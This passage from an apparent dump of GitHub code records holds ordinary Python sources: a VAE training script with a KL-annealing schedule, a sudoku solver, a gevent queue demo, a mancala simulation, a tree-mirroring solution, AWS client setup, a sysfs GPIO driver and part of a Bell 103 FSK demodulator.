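The cyclical sigmoid schedule produced by MakeAnnealingWeights above (including the source's pointspercycle+1 quirk on later cycles, reproduced here) is easy to inspect with small numbers; 8 epochs over 2 cycles are hypothetical values chosen for readability.

import numpy as np

epochs, cycles = 8, 2
pts = epochs // cycles
w = 1 / (1 + np.exp(-np.linspace(-10, 10, num=pts)))
for _ in range(cycles - 1):
    w = np.append(w, 1 / (1 + np.exp(-np.linspace(-10, 10, num=pts + 1))))
print(np.round(w, 3))   # ramps ~0 -> ~1, then restarts for each cycle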
datasetTest.shuffle(buffer_size=100,seed=125)\n datasetTest = datasetTest.batch(batch_size)\n datasetTest = datasetTest.prefetch(2)\n \n _,_,Encoder,Decoder,AE = MakeMixerVariationalAutoencoder(inShape,Arch,1)\n KLAposition = [k for k,val in enumerate(AE.get_weights()) if len(val.shape)==0][0]\n\n AE.compile(Adam(learning_rate=lr,decay=decay),loss='mse')\n history = AE.fit(datasetTrain,epochs=epochs,\n validation_data=datasetTest,callbacks=[KLAnnealing(KLAposition,AnnealingWeights)])\n \n ScalersContainer.append(scaler)\n EncoderContainer.append(Encoder)\n AEContainer.append(AE)\n HistoryContainer.append(history)\n \n dump(scaler,outputPath + '/scaler'+fold+'.joblib')\n AE.save(outputPath + '/AE'+fold+'.h5')\n Encoder.save(outputPath + '/Encoder'+fold+'.h5')\n\n tf.compat.v1.set_random_seed(globalSeed)\n\n###############################################################################\n# Learning curves\n###############################################################################\n\nRepresentationContainer = []\n\nfig,axs = plt.subplots(2,5,figsize=(30,15))\n\nfor k,hist in enumerate(HistoryContainer):\n \n axs[0,k].plot(hist.history['loss'],'k-',label = 'Loss')\n axs[0,k].plot(hist.history['val_loss'],'r-',label = 'Validation Loss')\n axs[0,k].title.set_text('Reconstruction loss')\n PlotStyle(axs[0,k])\n \n axs[1,k].plot(hist.history['kl_loss'],'k-',label = 'Loss')\n axs[1,k].plot(hist.history['val_kl_loss'],'r-',label = 'Validation Loss')\n axs[1,k].title.set_text('Kullback–Leibler loss')\n PlotStyle(axs[1,k])\n \nplt.tight_layout()\nplt.savefig(outputPath+'/figtraining.png')\n\n###############################################################################\n# Latent space visualization\n###############################################################################\n\nvalDataFrame = pd.DataFrame()\nvalDataFrame['ids'] = Validation['validation']\n\nvalidationData = np.array(KmerData.loc[Validation['validation']])\nperformance = []\n\nfig,axs = plt.subplots(1,5,figsize=(30,15))\n\nfor k,block in enumerate(zip(ScalersContainer,EncoderContainer,AEContainer)):\n \n sclr,enc,ae = block\n \n valData = sclr.transform(validationData)\n valData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in valData]).reshape((-1,37,37,1))\n \n datasetVal = tf.data.Dataset.from_tensor_slices((valData,valData))\n datasetVal = datasetVal.batch(batch_size)\n datasetVal = datasetVal.prefetch(2)\n \n performance.append(ae.evaluate(datasetVal))\n VariationalRepresentation = enc.predict(datasetVal)\n valDataFrame['Dim0_model'+str(k)] = VariationalRepresentation[:,0]\n valDataFrame['Dim1_model'+str(k)] = VariationalRepresentation[:,1]\n \n axs[k].scatter(VariationalRepresentation[:,0],VariationalRepresentation[:,1],alpha=0.15)\n axs[k].title.set_text('Latent Space (model = ' + str(k) +')')\n PlotStyle(axs[k])\n\nplt.tight_layout() \nplt.savefig(outputPath+'/figls.png')\n\nvalDataFrame.to_csv(outputPath+'/ValDimReduction.csv')\n\n###############################################################################\n# Out of sample performance \n###############################################################################\n\nplt.figure()\nplt.bar(np.arange(len(performance)),[val[0] for val in performance])\nax = plt.gca()\nax.set_ylabel('Reconstruction Loss',size=13)\nax.set_xlabel('Folds',size=13)\nPlotStyle(ax)\nplt.savefig(outputPath+'/recloss.png')\n\n\nplt.figure()\nplt.bar(np.arange(len(performance)),[val[1] for val in performance])\nax = plt.gca()\nax.set_ylabel('KL 
Loss',size=13)\nax.set_xlabel('Folds',size=13)\nPlotStyle(ax)\nplt.savefig(outputPath+'/KLloss.png')\n\n###############################################################################\n# Complete metadata dataset \n###############################################################################\n\ncompleteDataFrame = pd.DataFrame()\ncompleteDataFrame['ids'] = Complete['complete']\n\ncompleteData = np.array(KmerData.loc[Complete['complete']])\n\nfor k,block in enumerate(zip(ScalersContainer,EncoderContainer,AEContainer)):\n \n sclr,enc,ae = block\n \n comData = sclr.transform(completeData)\n comData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in comData]).reshape((-1,37,37,1))\n datasetCom = tf.data.Dataset.from_tensor_slices((comData,comData))\n \n datasetCom = datasetCom.batch(batch_size)\n datasetCom = datasetCom.prefetch(2)\n \n VariationalRepresentation = enc.predict(datasetCom)\n \n completeDataFrame['Dim0_model'+str(k)] = VariationalRepresentation[:,0]\n completeDataFrame['Dim1_model'+str(k)] = VariationalRepresentation[:,1]\n \ncompleteDataFrame.to_csv(outputPath+'/CompDimReduction.csv')\n\n","repo_name":"TavoGLC/SlidingSampling","sub_path":"models/Model02.py","file_name":"Model02.py","file_ext":"py","file_size_in_byte":22032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21298102275","text":"import copy\n\n\ndef getGroups(mat):\n pass\n\n\ndef reduceGroup(groups):\n \"\"\"return True if can reduce group and False if not\"\"\"\n pass\n\n\ndef reduce(matrix):\n changed = True\n groups = getGroups(matrix)\n\n while changed:\n changed = reduceGroups(groups)\n\n\ndef solutionViable(matrix):\n \"\"\"Check that no set is empty\"\"\"\n for i in range(9):\n for j in range(9):\n if len(matrix[i][j]) == 0:\n return False\n\n return True\n\n\ndef solve(matrix):\n reduce(matrix)\n\n if not solutionViable(matrix):\n return None\n\n if solutionOK(matrix):\n return matrix\n\n print('Searching...')\n for i in range(9):\n for j in range(9):\n if len(matrix[i][j]) > 1:\n for k in matrix[i][j]:\n mcopy = copy.deepcopy(matrix)\n mcopy[i][j] = {k}\n\n result = solve(mcopy)\n\n if result is not None:\n return result\n\n return None\n\n\ndef read_file(f):\n matrix = []\n for line in open(f):\n print(line)\n columns = []\n for col in line.rstrip('\\n').split():\n if not col.isdigit():\n columns.append(set())\n else:\n columns.append(int(col))\n matrix.append(columns)\n return matrix\n\n\ndef main():\n input_file = input('Please enter a Sudoku puzzle file name:')\n matrix = read_file(input_file)\n\n","repo_name":"dejac001/DataStructures","sub_path":"sudoku/sudoku_dfs.py","file_name":"sudoku_dfs.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34768562504","text":"\nfrom time import sleep\nimport requests\nimport gevent\nfrom gevent.queue import Queue\nfrom gevent.pool import Pool\nfrom gevent import monkey\nmonkey.patch_socket()\n\n# put和get都有非阻塞的版本,put_nowait和get_nowait不会阻塞,然而在操作不能完成时抛出\n# gevent.queue.Empty或gevent.queue.Empty异常。\n\npool = Pool()\ntasks = Queue()\nnums = 0\n\ndef worker():\n global nums\n while nums:\n task = tasks.get()\n print(nums)\n nums -= 1\n print('Quitting time!')\n\n\ndef boss():\n # headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}\n\n def _(url):\n # response = requests.get(url, headers=headers)\n response = requests.get(url)\n # sleep(300 / 1000)\n print(url)\n 
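The solve() routine in the sudoku record above branches by deep-copying the grid and pinning one candidate at a time; here is the same copy-and-branch pattern on a toy two-cell puzzle (hypothetical data), with the consistency check written out since the original leaves getGroups/reduce as stubs.

import copy

def solved(grid):
    return all(len(cell) == 1 for cell in grid)

def consistent(grid):
    # toy constraint: the two cells must end up different
    return not (len(grid[0]) == 1 and grid[0] == grid[1])

def search(grid):
    if not consistent(grid):
        return None
    if solved(grid):
        return grid
    i = next(k for k, cell in enumerate(grid) if len(cell) > 1)
    for v in grid[i]:
        branch = copy.deepcopy(grid)   # branch on a copy, as solve() does
        branch[i] = {v}
        result = search(branch)
        if result is not None:
            return result
    return None

print(search([{1, 2}, {1}]))   # [{2}, {1}]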
tasks.put_nowait(url)\n\n global nums\n page_url_base = 'http://www.mala.cn/forum-70-{0}.html'\n page_urls = [page_url_base.format(i) for i in range(1, 100)]\n nums = len(page_urls)\n # [pool.apply_async(_, args=(obj,)) for obj in page_urls]\n [pool.apply(_, args=(obj,)) for obj in page_urls]\n # pool.map_async(_, page_urls)\n\n\nimport time\nst = time.time()\ngevent.spawn(boss).join()\ngevent.spawn(worker).join()\nprint('total: ', time.time() - st)\n","repo_name":"Rockyzsu/StudyRepo","sub_path":"Python_Study/python基础/coroutine/gevent_queue.py","file_name":"gevent_queue.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"71346482287","text":"import random\nimport datetime\n\n# testing GitHub connection\n\n\n#starting menu\nprint(\"\")\nprint(\"Welcome to Mancala!\")\nprint(\"\")\n\nstartTime = datetime.datetime.now()\nprint(startTime)\nprint(\"\")\n\n# track system time??\n# maybe create a bigger wile loop starting here...\nstartCommand = input(\"Enter 'y' to run a game. Enter 'q' to QUIT.\")\n\nif startCommand == \"y\":\n playing = True\n print(\"the game has begun...\")\nelif startCommand == \"q\":\n playing = False\n print(\"You have QUIT the game.\")\nelse:\n playing = False\n print(\"Unexpected entry. The game is over.\")\n\nstartTime = datetime.datetime.now()\nprint(startTime)\nprint(\"\")\n\n\n\n#Next up...\n#\n# run through multiple games... keep track of winners\n\n# *** the game needs to be reset ***\n\n# make the random bin choice more sophisticated\n\nwinsByOne = 0\nwinsByTwo = 0\n\n\nfor gameNumber in range(100):\n moveCount = 1\n\n binAmount = [4, 4, 4, 4, 4, 4, 0, 4, 4, 4, 4, 4, 4, 0]\n\n playing = True\n\n playerOne = True\n\n messageCode = 0\n\n giveawayPile = -1\n\n lastRecipient = -1\n\n chosenBin = -1\n\n while(playing and moveCount < 101):\n\n # avoid printing\n \"\"\"\n print(\"Move number \" + str(moveCount))\n if playerOne: print(\"Player One's move...\")\n else: print(\"Player Two's move...\")\n\n message = \"\"\n if playerOne and messageCode == -2:\n message = \"Invalid input. Try again, Player One.\"\n elif not(playerOne) and messageCode == -2:\n message = \"Invalid input. 
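A minimal producer/consumer sketch of the gevent Queue pattern from the record above, without the network calls; gevent queues accept StopIteration as an end-of-stream sentinel, which keeps the consumer loop simple.

import gevent
from gevent.queue import Queue

tasks = Queue()

def producer():
    for i in range(3):
        tasks.put(i)
    tasks.put(StopIteration)   # sentinel: ends iteration over the queue

def consumer():
    for task in tasks:          # stops when the sentinel is reached
        print('got', task)

gevent.joinall([gevent.spawn(producer), gevent.spawn(consumer)])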
Try again, Player Two.\"\n elif playerOne and messageCode == -1:\n message = \"You must choose a non-empty bin, Player One.\"\n elif not(playerOne) and messageCode == -1:\n message = \"You must choose a non-empty bin, Player Two.\"\n print(\"\")\n print(message)\n print(\"\")\n \"\"\"\n messageCode = 0\n\n i = 0\n for element in binAmount:\n binAmount[i] = int(binAmount[i])\n if int(binAmount[i]) < 10:\n binAmount[i] = \" \" + str(binAmount[i])\n else:\n binAmount[i] = str(binAmount[i])\n i = i + 1\n # end of the for loop\n\n \"\"\"\n if not(playerOne):\n print(\" a b c d e f\")\n print(\"+----+----+----+----+----+----+----+----+\")\n print(\"| | \"+ binAmount[12] +\" | \"+ binAmount[11] \n +\" | \"+ binAmount[10] +\" | \"+ binAmount[9] \n +\" | \"+ binAmount[8] +\" | \"+ binAmount[7] +\" | |\")\n print(\"| \"+ binAmount[13] +\" |----+----+----+----+----+----| \"+ binAmount[6] +\" |\")\n print(\"| | \"+ binAmount[0] +\" | \"+ binAmount[1] \n +\" | \"+ binAmount[2] +\" | \"+ binAmount[3] \n +\" | \"+ binAmount[4] +\" | \"+ binAmount[5] +\" | |\")\n print(\"+----+----+----+----+----+----+----+----+\")\n if playerOne:\n print(\" f e d c b a\")\n print(\"\")\n \"\"\"\n\n #userInput = input(\"Enter a letter to choose a bin or enter 'q' to QUIT: \")\n\n # choosing a bin at random\n userInput = random.choice([\"a\",\"b\",\"c\",\"d\",\"e\",\"f\"])\n\n if userInput == \"q\":\n playing = False\n chosenBin = 0\n elif playerOne and userInput == \"a\":\n chosenBin = 5\n elif playerOne and userInput == \"b\":\n chosenBin = 4\n elif playerOne and userInput == \"c\":\n chosenBin = 3\n elif playerOne and userInput == \"d\":\n chosenBin = 2\n elif playerOne and userInput == \"e\":\n chosenBin = 1\n elif playerOne and userInput == \"f\":\n chosenBin = 0\n elif not(playerOne) and userInput == \"a\":\n chosenBin = 12\n elif not(playerOne) and userInput == \"b\":\n chosenBin = 11\n elif not(playerOne) and userInput == \"c\":\n chosenBin = 10\n elif not(playerOne) and userInput == \"d\":\n chosenBin = 9\n elif not(playerOne) and userInput == \"e\":\n chosenBin = 8\n elif not(playerOne) and userInput == \"f\":\n chosenBin = 7\n else:\n chosenBin = -2\n messageCode = -2 # invalid input\n\n\n\n if int(chosenBin) >= 0:\n giveawayPile = binAmount[chosenBin]\n binAmount[chosenBin] = 0\n if int(giveawayPile) <= 0:\n messageCode = -1 # empty bin was chosen\n\n recipient = chosenBin + 1\n while(int(giveawayPile) > 0):\n if(playerOne and int(recipient) == 13):\n recipient = 0\n if(not(playerOne) and int(recipient) == 6):\n recipient = 7\n\n binAmount[recipient] = int(binAmount[recipient]) + 1\n giveawayPile = int(giveawayPile) - 1\n \n if int(giveawayPile) == 0:\n lastRecipient = recipient\n else:\n recipient = int(recipient) + 1\n if int(recipient) > 13:\n recipient = 0\n\n if(playerOne and int(lastRecipient) == 6):\n playerOne = True\n elif(playerOne and int(binAmount[lastRecipient]) == 1 and int(lastRecipient) < 6):\n binAmount[6] = int(binAmount[6]) + int(binAmount[lastRecipient]) + int(binAmount[12 - int(lastRecipient)])\n binAmount[lastRecipient] = 0\n binAmount[12 - int(lastRecipient)] = 0\n playerOne = not(playerOne)\n elif(not(playerOne) and int(lastRecipient) == 13):\n playerOne = False\n elif(not(playerOne) and int(binAmount[lastRecipient]) == 1 and int(lastRecipient) > 6):\n binAmount[13] = int(binAmount[13]) + int(binAmount[lastRecipient]) + int(binAmount[12 - int(lastRecipient)])\n binAmount[lastRecipient] = 0\n binAmount[12 - int(lastRecipient)] = 0\n playerOne = not(playerOne)\n elif(int(messageCode) >= 
0):\n playerOne = not(playerOne)\n\n # checking for the end of the game\n sideOne = 0\n sideTwo = 0\n for j in range(6):\n sideOne = int(sideOne) + int(binAmount[j])\n sideTwo = int(sideTwo) + int(binAmount[j+7])\n\n if(int(sideOne) == 0 or int(sideTwo) == 0):\n playing = False\n binAmount[6] = int(binAmount[6]) + int(sideOne)\n binAmount[13] = int(binAmount[13]) + int(sideTwo)\n for k in range(6):\n binAmount[k] = 0\n binAmount[k+7] = 0\n\n moveCount = int(moveCount) + 1\n\n\n\n # end of the while loop\n print(\"\")\n print(\"Number of moves: \" + str(moveCount))\n print(\"The game is over!\")\n if int(binAmount[13]) < int(binAmount[6]):\n print(\"Player One has won the game!\")\n winsByOne = winsByOne + 1\n elif int(binAmount[13]) > int(binAmount[6]):\n print(\"Player Two has won the game!\")\n winsByTwo = winsByTwo + 1\n else:\n print(\"The game ended in a tie.\")\n\n i = 0\n for element in binAmount:\n binAmount[i] = int(binAmount[i])\n if int(binAmount[i]) < 10:\n binAmount[i] = \" \" + str(binAmount[i])\n else:\n binAmount[i] = str(binAmount[i])\n i = i + 1\n # end of the for loop\n\n\n t = datetime.datetime.now()\n print(\"Time: \" + str(t) + \" Game Number: \" + str(gameNumber))\n print(\"\")\n\nprint(\"\")\nprint(\"Results...\")\nprint(\"Start time: \"+str(startTime))\nprint(\"End Time: \"+str(t))\nprint(\"One: \"+str(winsByOne))\nprint(\"Two: \"+str(winsByTwo))\n\n","repo_name":"jlm2357/mancala","sub_path":"mancala_compVcomp.py","file_name":"mancala_compVcomp.py","file_ext":"py","file_size_in_byte":7456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69814600047","text":"\"\"\"\n@Author: yanzx\n@Date: 2021-08-11 10:17:04\n@Desc: 二叉树的镜像\n\n后序遍历 交换节点\n\n\"\"\"\nfrom utils.binary_tree import create_tree, TreeNode, floor_print\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n def dfs(root: TreeNode):\n if root is not None:\n self.mirrorTree(root.left)\n self.mirrorTree(root.right)\n root.left, root.right = root.right, root.left\n dfs(root)\n return root\n\nif __name__ == '__main__':\n nums = [4, 2, 7, 1, 3, 6, 9]\n root = create_tree(nums)\n floor_print(root)\n s = Solution()\n new_root = s.mirrorTree(root)\n print(\"*\" * 20)\n\n floor_print(new_root)\n","repo_name":"yanzhenxing123/algorithms","sub_path":"剑指offer/27. 二叉树的镜像.py","file_name":"27. 
二叉树的镜像.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"42119568545","text":"from boto3 import client\nfrom app.archive_constants import AWS_KEY_ID, AWS_SECRET_KEY, AWS_REGION\nfrom botocore.client import Config\n\nclient_sdb = client('sdb',\n region_name = AWS_REGION,\n aws_access_key_id = AWS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_KEY)\n\n\ns3_client = client('s3',\n aws_access_key_id = AWS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_KEY)","repo_name":"amplabs-ai/ampcloud-service","sub_path":"app/utilities/aws_connection.py","file_name":"aws_connection.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27776311157","text":"from common.drivers.gpio import GPIODriver, GPIOMode, GPIOResistorState\n\n__all__ = ('DIRECTIONS', 'INPUT', 'OUTPUT',\n 'EDGES', 'RISING', 'FALLING', 'BOTH',\n 'Controller')\n\nimport errno\nimport os\nimport select\nimport logging\n\nLogger = logging.getLogger('sysfs.gpio')\nLogger.addHandler(logging.StreamHandler())\nLogger.setLevel(logging.DEBUG)\n\n# Sysfs constants\n\nSYSFS_BASE_PATH = '/sys/class/gpio'\n\nSYSFS_EXPORT_PATH = SYSFS_BASE_PATH + '/export'\nSYSFS_UNEXPORT_PATH = SYSFS_BASE_PATH + '/unexport'\n\nSYSFS_GPIO_PATH = SYSFS_BASE_PATH + '/gpio%d'\nSYSFS_GPIO_DIRECTION_PATH = SYSFS_GPIO_PATH + '/direction'\nSYSFS_GPIO_EDGE_PATH = SYSFS_GPIO_PATH + '/edge'\nSYSFS_GPIO_VALUE_PATH = SYSFS_GPIO_PATH + '/value'\nSYSFS_GPIO_ACTIVE_LOW_PATH = SYSFS_GPIO_PATH + '/active_low'\n\nSYSFS_GPIO_VALUE_LOW = '0'\nSYSFS_GPIO_VALUE_HIGH = '1'\n\n# Public interface\n\nINPUT = 'in'\nOUTPUT = 'out'\n\nRISING = 'rising'\nFALLING = 'falling'\nBOTH = 'both'\n\nACTIVE_LOW_ON = 1\nACTIVE_LOW_OFF = 0\n\nDIRECTIONS = (INPUT, OUTPUT)\nEDGES = (RISING, FALLING, BOTH)\nACTIVE_LOW_MODES = (ACTIVE_LOW_ON, ACTIVE_LOW_OFF)\n\n\nclass Pin(object):\n \"\"\"\n Represent a pin in SysFS\n \"\"\"\n\n def __init__(self, number, direction, callback=None, edge=None, active_low=0):\n \"\"\"\n @type number: int\n @param number: The pin number\n @type direction: int\n @param direction: Pin direction, enumerated by C{Direction}\n @type callback: callable\n @param callback: Method be called when pin changes state\n @type edge: int\n @param edge: The edge transition that triggers callback,\n enumerated by C{Edge}\n @type active_low: int\n @param active_low: Indicator of whether this pin uses inverted\n logic for HIGH-LOW transitions.\n \"\"\"\n self._number = number\n self._direction = direction\n self._callback = callback\n self._active_low = active_low\n\n self._fd = open(self._sysfs_gpio_value_path(), 'r+')\n\n if callback and not edge:\n raise Exception('You must supply a edge to trigger callback on')\n\n with open(self._sysfs_gpio_direction_path(), 'w') as fsdir:\n fsdir.write(direction)\n\n if edge:\n with open(self._sysfs_gpio_edge_path(), 'w') as fsedge:\n fsedge.write(edge)\n\n if active_low:\n if active_low not in ACTIVE_LOW_MODES:\n raise Exception('You must supply a value for active_low which is either 0 or 1.')\n with open(self._sysfs_gpio_active_low_path(), 'w') as fsactive_low:\n fsactive_low.write(str(active_low))\n\n @property\n def callback(self):\n \"\"\"\n Gets this pin callback\n \"\"\"\n return self._callback\n\n @callback.setter\n def callback(self, value):\n \"\"\"\n Sets this pin callback\n \"\"\"\n self._callback = value\n\n @property\n def direction(self):\n \"\"\"\n 
Pin direction\n \"\"\"\n return self._direction\n\n @property\n def number(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._number\n\n @property\n def active_low(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._active_low\n\n def set(self):\n \"\"\"\n Set pin to HIGH logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_HIGH)\n self._fd.seek(0)\n\n def reset(self):\n \"\"\"\n Set pin to LOW logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_LOW)\n self._fd.seek(0)\n\n def read(self):\n \"\"\"\n Read pin value\n\n @rtype: int\n @return: I{0} when LOW, I{1} when HIGH\n \"\"\"\n val = self._fd.read()\n self._fd.seek(0)\n return int(val)\n\n def fileno(self):\n \"\"\"\n Get the file descriptor associated with this pin.\n\n @rtype: int\n @return: File descriptor\n \"\"\"\n return self._fd.fileno()\n\n def changed(self, state):\n if callable(self._callback):\n self._callback(self.number, state)\n\n def _sysfs_gpio_value_path(self):\n \"\"\"\n Get the file that represent the value of this pin.\n\n @rtype: str\n @return: the path to sysfs value file\n \"\"\"\n return SYSFS_GPIO_VALUE_PATH % self.number\n\n def _sysfs_gpio_direction_path(self):\n \"\"\"\n Get the file that represent the direction of this pin.\n\n @rtype: str\n @return: the path to sysfs direction file\n \"\"\"\n return SYSFS_GPIO_DIRECTION_PATH % self.number\n\n def _sysfs_gpio_edge_path(self):\n \"\"\"\n Get the file that represent the edge that will trigger an interrupt.\n\n @rtype: str\n @return: the path to sysfs edge file\n \"\"\"\n return SYSFS_GPIO_EDGE_PATH % self.number\n\n def _sysfs_gpio_active_low_path(self):\n \"\"\"\n Get the file that represents the active_low setting for this pin.\n\n @rtype: str\n @return: the path to sysfs active_low file\n \"\"\"\n return SYSFS_GPIO_ACTIVE_LOW_PATH % self.number\n\n\nclass Controller(object):\n '''\n A singleton class to provide access to SysFS GPIO pins\n '''\n\n def __new__(cls, *args, **kw):\n if not hasattr(cls, '_instance'):\n instance = super(Controller, cls).__new__(cls)\n instance._allocated_pins = {}\n instance._poll_queue = select.epoll()\n\n instance._available_pins = []\n instance._running = True\n\n # Cleanup before stopping reactor\n # reactor.addSystemEventTrigger('before', 'shutdown', instance.stop)\n\n # Run the EPoll in a Thread, as it blocks.\n # reactor.callInThread(instance._poll_queue_loop)\n\n cls._instance = instance\n return cls._instance\n\n def __init__(self):\n self.EPOLL_TIMEOUT = 1 # second\n\n def _poll_queue_loop(self):\n pass\n # while self._running:\n # try:\n # events = self._poll_queue.poll(EPOLL_TIMEOUT)\n # except IOError as error:\n # if error.errno != errno.EINTR:\n # Logger.error(repr(error))\n # reactor.stop()\n # if len(events) > 0:\n # reactor.callFromThread(self._poll_queue_event, events)\n\n @property\n def available_pins(self):\n return self._available_pins\n\n @available_pins.setter\n def available_pins(self, value):\n self._available_pins = value\n\n def stop(self):\n self._running = False\n values = self._allocated_pins.copy().values()\n for pin in values:\n self.dealloc_pin(pin.number)\n\n def alloc_pin(self, number, direction, callback=None, edge=None, active_low=0):\n # TODO: remember which pins we exported and do unexport later\n Logger.debug('SysfsGPIO: alloc_pin(%d, %s, %s, %s, %s)'\n % (number, direction, callback, edge, active_low))\n\n self._check_pin_validity(number)\n\n if direction not in DIRECTIONS:\n raise Exception(\"Pin direction %s not in %s\"\n % (direction, DIRECTIONS))\n\n if callback and 
edge not in EDGES:\n raise Exception(\"Pin edge %s not in %s\" % (edge, EDGES))\n\n if not self._check_pin_already_exported(number):\n with open(SYSFS_EXPORT_PATH, 'w') as export:\n export.write('%d' % number)\n else:\n Logger.debug(\"SysfsGPIO: Pin %d already exported\" % number)\n\n pin = Pin(number, direction, callback, edge, active_low)\n\n if direction is INPUT:\n self._poll_queue_register_pin(pin)\n\n self._allocated_pins[number] = pin\n return pin\n\n def _poll_queue_register_pin(self, pin):\n ''' Pin responds to fileno(), so it's pollable. '''\n self._poll_queue.register(pin, (select.EPOLLPRI | select.EPOLLET))\n\n def _poll_queue_unregister_pin(self, pin):\n self._poll_queue.unregister(pin)\n\n def dealloc_pin(self, number):\n\n Logger.debug('SysfsGPIO: dealloc_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n with open(SYSFS_UNEXPORT_PATH, 'w') as unexport:\n unexport.write('%d' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction is INPUT:\n self._poll_queue_unregister_pin(pin)\n\n del pin, self._allocated_pins[number]\n\n def get_pin(self, number):\n\n Logger.debug('SysfsGPIO: get_pin(%d)' % number)\n\n return self._allocated_pins[number]\n\n def set_pin(self, number):\n\n Logger.debug('SysfsGPIO: set_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].set()\n\n def reset_pin(self, number):\n\n Logger.debug('SysfsGPIO: reset_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].reset()\n\n def get_pin_state(self, number):\n\n Logger.debug('SysfsGPIO: get_pin_state(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction == INPUT:\n self._poll_queue_unregister_pin(pin)\n\n val = pin.read()\n\n if pin.direction == INPUT:\n self._poll_queue_register_pin(pin)\n\n if val <= 0:\n return False\n else:\n return True\n\n ''' Private Methods '''\n\n def _poll_queue_event(self, events):\n \"\"\"\n EPoll event callback\n \"\"\"\n\n for fd, event in events:\n if not (event & (select.EPOLLPRI | select.EPOLLET)):\n continue\n\n try:\n values = self._allocated_pins.itervalues()\n except AttributeError:\n values = self._allocated_pins.values()\n for pin in values:\n if pin.fileno() == fd:\n pin.changed(pin.read())\n\n def _check_pin_already_exported(self, number):\n \"\"\"\n Check if this pin was already exported on sysfs.\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when it's already exported, otherwise C{False}\n \"\"\"\n gpio_path = SYSFS_GPIO_PATH % number\n return os.path.isdir(gpio_path)\n\n def _check_pin_validity(self, number):\n \"\"\"\n Check if pin number exists on this bus\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when valid, otherwise C{False}\n \"\"\"\n\n if number not in self._available_pins:\n raise Exception(\"Pin number out of range\")\n\n if number in self._allocated_pins:\n raise Exception(\"Pin already allocated\")\n\n\nclass SysfsGPIODriver(GPIODriver):\n\n class SysfsChannel(GPIODriver.Channel):\n\n def __init__(self, pin: Pin):\n super().__init__()\n self.__pin = pin\n\n def write(self, state: [int, bool]):\n if state:\n self.__pin.set()\n else:\n self.__pin.reset()\n\n def mode(self):\n return 
GPIOMode.READ if self.__pin.direction == INPUT else GPIOMode.WRITE\n\n def set_mode(self, direction: int, resistor=GPIOResistorState.UNKNOWN):\n raise NotImplementedError()\n # if direction == GPIODriver.GPIO_MODE_READ:\n # self.__pin.direction = INPUT\n # else:\n # self.__pin.direction = OUTPUT\n\n def read(self, reverse=False) -> int:\n return self.__pin.read()\n\n def __init__(self):\n super().__init__()\n self.__gpio_controller = Controller()\n\n def on_initialized(self, application):\n self.__gpio_controller.available_pins = [1, 2, 3, 4, 6, 12] # TODO: This should be in params\n\n def new_channel(self, pin: [str, int], direction: GPIOMode,\n resistor_mode: GPIOResistorState = GPIOResistorState.PULLUP) -> SysfsChannel:\n pin = self.resolve_pin_name(pin)\n if isinstance(pin, GPIODriver.Channel):\n return pin\n pin = self.__gpio_controller.alloc_pin(pin, (INPUT if GPIOMode.READ == direction else OUTPUT))\n return SysfsGPIODriver.SysfsChannel(pin)\n\n\n","repo_name":"JointBox/jointbox","sub_path":"src/unix/sysfs/gpio.py","file_name":"gpio.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"17597940186","text":"import soundfile as sf\nimport numpy as np \nimport sys\nfrom math import pi\n\n\n# CONSTANTS\nWAV_DATATYPE = 'float32'\nBAUD_RATE = 300\nMARK = 1\nSPACE = 0\nMARK_FREQ = 2225 \nSPACE_FREQ = 2025 \n\n\n# Goertzel filter\nclass Goertzel:\n \n def __init__(self, sampleRate, frameSize, frequency):\n self.w0 = 2*pi*frequency/sampleRate\n self.norm = np.exp(np.complex(0, self.w0 * frameSize))\n self.coeff = np.array([np.exp(np.complex(0, -self.w0 * k)) for k in range(frameSize)])\n\n def filter(self, samples):\n assert len(samples) == len(self.coeff), \"Window size does not match number of coeffecients\"\n return self.norm * np.dot(samples, self.coeff)\n \n \n# Demodulator for answer signal from Bell 103 modem \nclass Demodulator:\n\n def __init__(self, sampleRate, frameSize):\n self.sampleRate = sampleRate\n self.frameSize = frameSize\n self.filterSpace = Goertzel(sampleRate, frameSize, SPACE_FREQ) \n self.filterMark = Goertzel(sampleRate, frameSize, MARK_FREQ) \n\n def decode(self, frame):\n markMag = abs(self.filterMark.filter(frame))\n spaceMag = abs(self.filterSpace.filter(frame))\n if markMag > spaceMag:\n return MARK\n elif spaceMag > markMag:\n return SPACE\n \n assert True, \"Ambiguous detection\"\n\n\n# flip the bits array and return ascii value as a char\ndef 